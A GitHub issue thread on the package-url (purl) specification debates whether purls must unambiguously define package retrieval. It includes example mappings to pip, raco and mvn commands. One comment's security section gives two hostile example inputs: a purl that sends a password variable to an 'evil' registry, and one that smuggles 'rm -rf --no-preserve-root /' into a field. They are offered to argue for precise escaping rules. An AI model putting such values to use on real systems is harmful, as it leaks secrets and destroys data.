### ISSUE TITLE
Retrieval isn't defined

### ISSUE THREAD

**Issue by jackfirth** [package-url/purl-spec#5]
URLs, in contrast to URIs, *locate* resources in addition to identifying them, allowing clients to *retrieve a representation* of the resource. Furthermore, how to retrieve such a representation must be defined solely by the specification of the URI scheme and must be *globally unambiguous*, so that two spec-conforming implementations of the scheme can't have two inconsistent interpretations of what "retrieval" means.

Note that consistent interpretation of retrieval does not imply identical retrieved resources, as a scheme specification's definition of retrieval can define ways for such retrieval to depend on configuration (such as a client's choice of DNS resolver) and other external state.

If a goal of `purl-spec` is to define URLs instead of URNs (which I suspect is a more useful goal), then the spec MUST (in the sense of [RFC 2119](rfc2119)) define how representations of package resources are retrieved and that definition MUST be unambiguous. Otherwise, two implementations could provide entirely different package representations for the same client retrieving the same package with no clear answer as to which retrieved representation is "correct".

**Comment by pombredanne** [comment]
`purl`s are IMHO unambiguous URLs allowing the clients to retrieve the corresponding package alright.
The whole point is that a package `type` encapsulate the "protocol" to get this package (I use protocol here in the sense of the overall procedure to retrieve and install or make use of a package, not specifically as a transport such as `HTTP`)

Say for instance that on sunny Sunday afternoon, I write a meta package fetching tool that would have this command line spec:
```
    meta-packa-fetch <purl>
```

It accepts a `purl` argument and will fetch the code pointed to by this `purl` for a package. 

For instance:
- `meta-packa-fetch racket:point-free` here my CLI would likely spawn a call to `raco pkg install point-free`

- `meta-packa-fetch pypi:django:1.11.1` here my CLI would likely spawn a call to `pip install django==1.11.1`

- `meta-packa-fetch maven:io/github/subiyacryolite/jds@3.0.1` .... here my CLI may fetch http://repo1.maven.org/maven2/io/github/subiyacryolite/jds/3.0.1/jds-3.0.1.jar over https or may instead spawn a maven cli such as `mvn org.apache.maven.plugins:maven-dependency-plugin:2.1:get
    -Dartifact=io.github.subiyacryolite:jds:3.0.1`

What this `meta-packa-fetch` tool could do is therefore:
1. parse the `purl` CLI arg in its component data 
2. based on the `type`, transform these data in native package manager-specific invocation arguments and options
3. fork a call  delegating the heavy lifting to the package manager CLI tool

Therefore, the "retrieval protocol" details are entirely specified by the package management tools and  globally not ambiguous. These details do not need to be repeated in the `purl` spec IMHO, especially since there could be several package management tools for a given type: mvn, sbt, graddle, ivy for Maven, npm or yarn for NPM, pip, easy_install and several other for Python, etc.  

A `purl` client can be implemented to `locate` resources in addition to `identifying` them to `retrieve` a representation of the resource. And `how to retrieve` such a representation is defined solely by the specification of the `purl` scheme/type and is globally unambiguous.

The minute details of `how to` locate, fetch, install, resolve deps, et.c are the concerns of the package manager  specifications. The `purl` is focused first on the `what` not the `how`. You can get to the `how` via the `type`/`scheme` though and this is eventually complex and nicely encapsulated in the `scheme`.

Side note: the `meta-packa-fetch` tool should never be written IMHO as this is a non-goal for a `purl` but it could be fun ;)

**Comment by jackfirth** [comment]
> The whole point is that a package type encapsulate the "protocol" to get this package (I use protocol here in the sense of the overall procedure to retrieve and install or make use of a package, not specifically as a transport such as HTTP)

Except you _have_ to specify those sorts of transport layer details to make retrieval unambiguous. The HTTP spec itself cites this in it's choice to define separate `http` and `https` schemes:

> Although HTTP is independent of the transport protocol, the "http" scheme is specific to TCP-based services because the name delegation process depends on TCP for establishing authority.  An HTTP service based on some other underlying connection protocol would presumably be identified using a different URI scheme, just as the "https" scheme (below) is used for resources that require an end-to-end secured connection.

If the spec didn't do this, then with the _same_ `http://foo.com/bar` URL two different clients could choose to start a TCP connection to port 80 or a TLS connection to port 443 and talk to two completely different origins, causing problems for the TLS server which now can't assume that links it generates are safe to use unless it knows that the corresponding port 80 origin is owned by a trusted party!

### Ambiguity

As for the `meta-package-fetch` examples:

> `meta-packa-fetch racket:point-free` here my CLI would likely spawn a call to `raco pkg install point-free`.

Under what shell syntax? POSIX `sh`? What about Windows shells? Can clients _only_ dereference using a shell command, or can they directly speak the HTTP protocol? If they can do both, how is a client supposed to pick? Furthermore, the Racket package system has a notion of "catalogs" and currently `raco pkg` has a configurable list of catalogs to check in order of priority - should the `purl` spec for `racket` require this behavior? If it doesn't, what happens if two clients on the same machine make different decisions about what list of catalogs to use? And how are they supposed to make connections anyway - HTTP, HTTPS, or something else? The Racket package protocol isn't standardized anywhere so there aren't any specs you can refer to to avoid doing the spec work yourself here.

Also, Racket package catalogs offer the client the ability to pass in the version of their Racket runtime, possibly getting a different implementation of the package entirely (called a "version exception"). Do PURL clients have to do this when installing? If they do, what happens if the client isn't implemented in Racket? Also, how does a client determine _which_ racket to install the package for, since it's easy to have multiple Racket installations on the same system?

> `meta-package-fetch pypi:django:1.11.1` here my CLI would likely spawn a call to `pip install django==1.11.1`

Similar comments, but now things get even more interesting: what's an allowed version? Does Python standardize what versions are allowed? Has that standard changed between iterations of `pip`? If that version format has changed, is a client allowed to assume some common structure to a version or do they have to know exactly what version of `pip` is installed? If it hasn't, will it ever change going forward? How can you guarantee it won't, since that would break clients that make assumptions based on the version format as specified? If clients can't assume anything about the version, what use is is to them? They can't do `semver`-like reasoning about different package URLs without some common structure.

> `meta-packa-fetch maven:io/github/subiyacryolite/jds@3.0.1` .... here my CLI may fetch http://repo1.maven.org/maven2/io/github/subiyacryolite/jds/3.0.1/jds-3.0.1.jar over https **or may instead** spawn a maven cli such as mvn org.apache.maven.plugins:maven-dependency-plugin:2.1:get -Dartifact=io.github.subiyacryolite:jds:3.0.1

_Which one?_ That choice is exactly the kind of client ambiguity that a URI scheme needs to address.

Furthermore, all of these definitions of "retrieval" are _not_ retrieval actions. Retrieval must be both "safe" (no side-effects the caller is responsible for) and "idempotent" (can be retried arbitrarily without affecting semantics). If "retrieval" of a package is defined as "installing" that package, neither of these conditions is satisfied. It's unsafe because installing a package can have system-wide state changes that a caller has to be aware of. It's not idempotent because many package managers add custom post-installation hooks that run after installing and running those hooks might not be idempotent.

### Security

Presuming the PURL spec describes retrieval in terms of shell command invocations, that means that it's entirely reasonable for operating systems to automatically run those shell commands when someone clicks on a package link. That's how clicking `mailto` URIs opens your system default email client. But what if I send you a PURL like this and you click it:

> `docker:my-evil-registry.com/${MY_PASSWORD}`

Now I've gotten you to send an HTTP request containing sensitive data to a server I control. This attack isn't limited to leaking secrets or to PURL schemes allowing a specified server either:

> `pypi:django:${rm -rf --no-preserve-root /}`

Character restrictions and percent encoding won't stop this - you need to specify the precise details of how shell invocation of a PURL is performed and that specification needs to describe how shell escaping and other shell syntax features interact with the PURL's components.

### Summary

I really think you should send an email to the [`uri-review@ietf.org` mailing list](https://www.ietf.org/mailman/listinfo/uri-review) asking for more guidance here. Defining globally unambiguous identifiers is very difficult and should be either avoided if at all possible or attempted with great caution and engagement with URI experts.

**Comment by pombredanne** [comment]
> Except you have to specify those sorts of transport layer details to make retrieval unambiguous. The HTTP spec itself cites this in it's choice to define separate http and https schemes: [...]

I am not sure I have to specify the transport details. `tel:` and `mailto:` URLs do not specify the transport in details: for tel, it could be SIP, POTS, Skype, whatsapp, etc....  It is not because http is hyper specified as a protocol that every URL scheme should be so IMHO.

**Comment by pombredanne** [comment]
> As for the meta-package-fetch examples:

This was an hypothetical example. This tool does not exists and will likely never ... so do not get excited about the details here and the details of how this would relate to CLI args and security implications...

The key point is that I do not need to specify the details of "how" a package of a given `type` is fetched. This is entirely encapsulated in the `type` and specified elsewhere in arbitrarily complex ways by one or more package management tool for this `type` (e.g zypper, dnf or yum for RPMs, apt-get or dpkg for Debian, mvn, sbt, gradle or ivy for Maven, etc)

The simple case is easy such as  `pypi:django:1.11.1` AND the complex cases are possible by using qualifiers as needed for instance to support a complex racket example: complex cases will have a complex `purl` with a lot of weird and long qualifiers OR they may not be fully specified... and that's fine: we can cope with some ambiguity for our use cases.

**Comment by pombredanne** [comment]
> I really think you should send an email to the uri-review@ietf.org mailing list asking for more guidance here. Defining globally unambiguous identifiers is very difficult and should be either avoided if at all possible or attempted with great caution and engagement with URI experts.

That's a great suggestion and we can surely do this once the dust settles on a mostly final spec.

@jackfirth  I'd be interested to get your take on #9 because this would likely address most of your URI/URL/URN/Content-Type "orthodoxy" concerns.

**Comment by pombredanne** [comment]
@jackfirth we got feedback from @mnot and @annevk  in #9
Are you satisfied with the current explanations e.g. can wee close this or not?

**Comment by pombredanne** [comment]
@jackfirth I am closing this now for lack of activity and I think I addressed your comments properly. We have also since moved to get a `pkg:` prefix and I will work to get this URI scheme registered at IANA in #124
